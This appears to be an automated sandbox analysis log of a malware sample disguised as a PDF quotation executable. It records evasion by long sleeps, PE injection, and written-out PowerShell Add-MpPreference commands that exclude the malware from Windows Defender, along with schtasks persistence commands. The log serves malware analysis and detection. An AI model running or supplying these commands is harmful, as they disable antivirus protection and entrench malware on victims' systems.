Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Memory allocated: 5B90000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Memory allocated: 6B90000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Memory allocated: D760000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Memory allocated: E760000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Memory allocated: EBF0000 memory reserve \| memory write watch

Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4036			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4702			Jump to behavior

Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe TID: 7352	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7660	Thread sleep count: 4036 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7808	Thread sleep time: -2767011611056431s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7628	Thread sleep count: 43 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7760	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7812	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7704	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7780	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe TID: 7776	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe TID: 8020	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Thread delayed: delay time: 60000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Thread delayed: delay time: 922337203685477

Source: mexnJkivovwH.exe, 0000000D.00000002.1742647145.0000000001078000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlli
Source: Quotation2025-0107pdf.exe, 00000008.00000002.2909417745.0000000000A78000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlll

Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe

Code function: 13_2_0040317B mov eax, dword ptr fs:[00000030h]

13_2_0040317B

Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe

Code function: 13_2_00402B7C GetProcessHeap,RtlAllocateHeap,

13_2_00402B7C

Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Quotation2025-0107pdf.exe"
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\mexnJkivovwH.exe"
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Quotation2025-0107pdf.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\mexnJkivovwH.exe"	Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Memory written: C:\Users\user\Desktop\Quotation2025-0107pdf.exe base: 400000 value starts with: 4D5A			Jump to behavior
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Memory written: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe base: 400000 value starts with: 4D5A

Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Quotation2025-0107pdf.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\mexnJkivovwH.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mexnJkivovwH" /XML "C:\Users\user\AppData\Local\Temp\tmp2404.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process created: C:\Users\user\Desktop\Quotation2025-0107pdf.exe "C:\Users\user\Desktop\Quotation2025-0107pdf.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mexnJkivovwH" /XML "C:\Users\user\AppData\Local\Temp\tmp36D0.tmp"
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Process created: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe "C:\Users\user\AppData\Roaming\mexnJkivovwH.exe"

Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Users\user\Desktop\Quotation2025-0107pdf.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
